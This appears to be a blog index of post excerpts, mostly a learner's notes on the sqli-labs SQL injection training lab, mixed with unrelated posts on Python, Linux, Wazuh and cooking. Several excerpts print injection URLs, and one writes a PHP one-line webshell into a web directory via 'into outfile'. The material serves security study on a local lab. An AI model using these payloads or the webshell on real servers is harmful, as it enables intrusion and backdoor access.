DebbieLi_Ca的博客

原创 python-1-合并两个字典

适用于python3.5+在这段程序中，合并两个字典，按照表达式中所给出的顺序从左到右依次覆盖x = {'a':1,'b':2}y = {'b':3,'c':4}z = {**x,**y}print(z)>>>{'a': 1, 'b': 3, 'c': 4}m = {'e':3,'f':2}n = {'g':3,'h':4}o = {**m,**n}print(o)>>>{'e': 3, 'f': 2, 'g': 3, 'h': 4}.

原创 合规基线/安全合规检查有手就行！（未完）

xdm！我又又又回来了！打不死的蟑螂，打不死的李坚强ing合规基线主机安全合规检查本文包含常见16条安全合规检查！小李有话说:对文件搜索替换语法: sed 选项 ‘s/搜索的内容/替换的内容/动作’ 文件其中 s:代表search 搜索； / 分隔符(可以自定义)； 动作一般是p打印和全局替换g\ 代表转义;^代表替换整行小李有话说:在linux中通常会使用shell结合正则表达式来过滤字符，本文将以一个简单的例子来说明+,*,[:space:]的一些用法+ 匹配1个或多个字

原创 分布式与集群

分布式与集群~分布式集群概念将多台服务器集中到一起，每台服务器都实现总体任务中不同的功能将多台服务器集中到一起，每台服务器都执行相同的功能优点加强了系统的可用性；细化了应用的功能模块，使系统模块化；提高了开发速度高可用性；高可管理性；可伸缩性（扩展性）强缺点每台服务器都缺一不可，一台故障可能整体会出问题或者相关功能不能使用；架构、部署、运维都会变得复杂应用接管过程可能会更长工作方式物理形态...

翻译 文档ing Wazuh——Agent（未完待续）

Wazuh由三部分组成：Agent端、Server端、ES下图是官方给出的整体架构图：Agentagent端负责信息收集，预防威胁和检测、响应功能，详细介绍继续观看呦~~下图为官方给出的Agent端详细架构：以下是他的部分功能~~Log collector这个模块可以读取日志信息和Windows事件包含的logcollector模块收集信息后将数据收集起来送到server端进行分析这里实现了远程接收系统日志：（自定义端口接受和存储在纯文本文件里）<ossec_config&g

原创 流程ing

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好！ 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Ma.

原创 “浅谈如何在渗透测试中快速搞定webshell”之小猪崽崽读 后 感 哦^_^……

就，久违的 “读后感”来自公众号DYBOY这篇文章总结了关于文件操作方面的漏洞，以及单纯从文件操作上来获取SHELL。啊~但是⑧小猪崽可能需要先补补课了hahahaha小猪崽读前预习ingwebshell：（web+shell）web服务器上 + 用脚本语言（asp,phph.jsp,cgi等）编写的脚本程序可以取得对服务器某种程度上权限操作简单来说webshell是web的一个管理工具，也是web入侵的脚本攻击工具。黑客经常会将自己编写的后门文件上传到web服务器的页面下与正常的网页文件

原创 新手必备——Linux命令

一、常用系统工作命令1.echo命令：用于在终端输出字符串或变量提取后的值，格式为echo[字符串|$变量][root@linuxprobe~] # echo Linuxprobe.Com2.data命令：用于显示及设置系统的时间或日期，格式为“date [选项][+指定格式]”参数：%t : 跳格【tab键】%H: 小时（00~23）%I： 小时（00~12）%M： 分钟（00~59）%S： 秒（00~59）%j： 今年中的第几天3.reboot命令：...

原创 lili‘s sqli-labs LESS09&LESS10

LESS091.http://127.0.0.1/sqli-labs-master/Less-9/?id=1'order by 3999--+c此时无论如何order by的值是多少都显示you are in......，所以不能使用这个判断2.http://127.0.0.1/sqli-labs-master/Less-9/?id=1'and sleep(5)--+他一直正在执行转圈圈~并且返回正常，说明存在漏洞（如果存在漏洞，睡眠五秒返回结果）3.时间盲注方法进行判断（less0..

原创 lili‘s sqli-labs LESS08

布尔盲注，可以参考less051.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' 判断此时存在注入漏洞，2.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+ 显示you are in........3.http://127.0.0.1/sqli-labs-master/Less-8/?id=1' order by 3--+，说明存在三列4.参考less05，先判断数据库名，然后二分...

原创 lili‘s sqli-labs Less07

1.http://localhost/sqli-labs-master/Less-7/?id=1')) order by 3--+2.http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["crow"]);?>' into outfile 'E:\\tools\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\a

原创 lili’s sqli-labs LESS7,8，9，10 补充知识

1.show variables like '%secure%';查看secure-file-priv当前的值，如果显示为NULL，则需要打开E:\tools\phpstudy\phpstudy_pro\Extensions\MySQL5.7.26\my.ini文件，在其中加一句：secure-file-priv="/".2.一句话木马：php版本：<?php @eval($_POST["crow"]);?>其中crow是密码（H:\xxxxxxx\Cracer\Cracer安全工具包V

原创 lili‘s sqli-labs LESS06

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";第六关与第五关的不同之处是第五关：http://localhost/sqli-labs-master/Less-5/?id=1'第六关：http://localhost/sqli-labs-master/Less-6/?id=1"其余步骤一样~

原创 lili’s LESS05盲注！！（小猪崽觉得这是个什么玩意儿嘤嘤嘤）

一.BOOL型-11.http://localhost/sqli-labs-master/Less-5/?id=1' 查看是否注入2.http://localhost/sqli-labs-master/Less-5/?id=1'order by 3--+ 查看有多少列出现··you are in .......表示成功3.http://localhost/sqli-labs-master/Less-5/?id=1'and left((select database()),1)='s'--+.

原创 lili‘s LESS05前知识补充

切换数据库：use security；1.left()函数：left(databaxe(),1)='s' left(a,b)从左侧截取a的前b位，正确则返回1，错误返回0（1）select database(); ——查询当前使用的数据库（2）select left(database(),1)='s'; ——前一位是否是s2.regexp函数：select user() regexp 'r' user()的结果是root，regexp为匹配root的正则表达式（1）select da..

原创 lili‘s sqli-labs LESS-3&LESS-4

LESS03输入？Id=1’后出现错误应为http://127.0.0.1/sqlilabs/Less-3/?id=2’)–+错误提示为”2”)LIMIT 0,1’.去掉前后两个单引号，和自己输入的一个单引号后还有两个单引号和一个括号，可推出sql注入中的由单引号和括号和起来的闭合模式。LESS04127.0.0.1/sqlilabs/Less-4/id=1’后没有出现错误提示：输入：127.0.0.1/sqlilabs/Less-4/id=1”后出现错误提示，’”1””)LIMIT 0,

原创 lili‘s sqli-labs less02（小猪崽有新发现）

今天拿到驾照啦~就很快落o！ 没想到我这么胆小的油呆头鹅人也可以拿到(●ˇ∀ˇ●)！！因为疫情原因在学校被封闭了好久，导致战线拉得很长别人都是四十天我是四个月诶╥﹏╥... 但！！结果总归是好的，这是②〇②①年的第一个证书了(●'◡'●)突然惊奇的发现less01和less02的测试流程好像欸~一.复习MySQL常见查询语句select table_name from information_schema.tables where table_schema = 'security';sele

原创 lili‘s sqli-labs less01（简直是在为难我小猪崽）

1.方便注入时对sql语句进行判断在sqli-labs代码里加入：echo $sql;echo "<br>";2.我使用的火狐浏览器，添加HackBar

原创 MySQL基本用法

1.查库：select schea_name from information_schema.schemata2.查表：select table_name from information_scema.tables where table_schema='security'3.查列：select column_name from information_schema.columns where table_name='users'4.查字段：select username,password f.

原创 sqli-labs安装（傻瓜版）

1.安装phpstudy安装成功如图所示2.安装sqli-labs-masters网址：https://github.com/Audi-1/sqli-labs将sqli-labs-masters解压，放到phpStudy安装目录下的E:\tools\phpstudy\phpstudy_pro\WWW3.修改E:\tools\phpstudy\phpstudy_pro\WWW\sqli-labs-masters\sql-connections\db-creds.inc文件中mysql.

原创 pip安装requests模块和bs4——傻瓜必看

着急不耐烦的小伙伴，可直接拉到最后o(*￣▽￣*)ブ1.下载piphttps://pypi.python.org/pypi/pip#downloads2.解压压缩包到自定义文件夹，cmd进入解压后的目录，输入命令：python setup.py install可以通过以下命令来判断是否已安装：pip --version # Python2.x 版本命令pip3 --version # Python3.x 版本命令3.安装setuptools模块下载地址.

原创 Genesis创世纪

**摘抄无论是锦绣还是抹布都会化为旧日时光，而时光会流逝。灵魂有多么嫉妒肉体。如此温暖又温柔的血肉之躯。自然界中的万事万物都是善恶争斗的标志。在短距离中，曼巴毒蛇跑的比马还快。新发现Trifle：涂了果酱，果冻，牛奶蛋糊和掼奶油，（搅打稀奶油）并在雪莉酒，朗姆酒或白兰地中浸渍的甜蛋糕。（1）牛奶蛋糊/蛋奶糊：蛋奶糊(custard)用料:425m|高脂浓奶油, 4个蛋黄、4茶匙(20g)金砂糖、10g玉米淀粉, 1茶匙(5g)香精。蛋奶糊做法:a.锅中倒入奶油,文火加热,不时搅拌。

原创 注入基础与sqlmap思维导图

原创 注入&Sqlmap

中心主题sqlmapSQLMap介绍1.Sqlmap介绍2.Sqlmap环境安装3.sqlmap下载sqlmaap版本查看sqlmap获取目标1.sqlmap直连数据库-d表示直连–banner 获取banner信息2.sqlmap URL探测3.sqlmap文件读取目标可以探测多个URL4.sqlmap google批量注入sqlmap请求参数设置Sqlmap设置HTTP方法get和putPOST在请求的时候，服

原创 网址中url编码

今天看视频发现不知道%20是个什么，查阅以后做个记录~字符 - URL编码值空格 - %20 " - %22# - %23 % - %25& - %26( - %28 ...

原创 信息收集导图

原创 信息收集

信息收集域名信息收集浏览网站过程（从DNS——>）whois协议whois查询Web接口查询whois命令行查询备案信息查询ICP备案查询方法是web接口子域名信息收集子域名介绍挖掘子域名重要性子域名挖掘方法子域名挖掘工具maltego CE、wydomain，subDomainBrute,dnsmpaer,Layer子域名挖掘机搜索引擎发掘第三方网站查询证书透明名度公开日志枚举其他刷洞思路针对某个具体SRC搜集子域

原创 触摸板使用！

触摸屏ing两只手指同时——滚动！ 三只手指向下扫——显示桌面~ 三只手指向上扫——显示所有窗口 拉伸或者收缩两只手指——放大或缩小文字和页面了。 三只手指左右扫——切换页面 两只手指单击——鼠标右键 三只手指同时——windows搜索 四只手指——打开操作中心...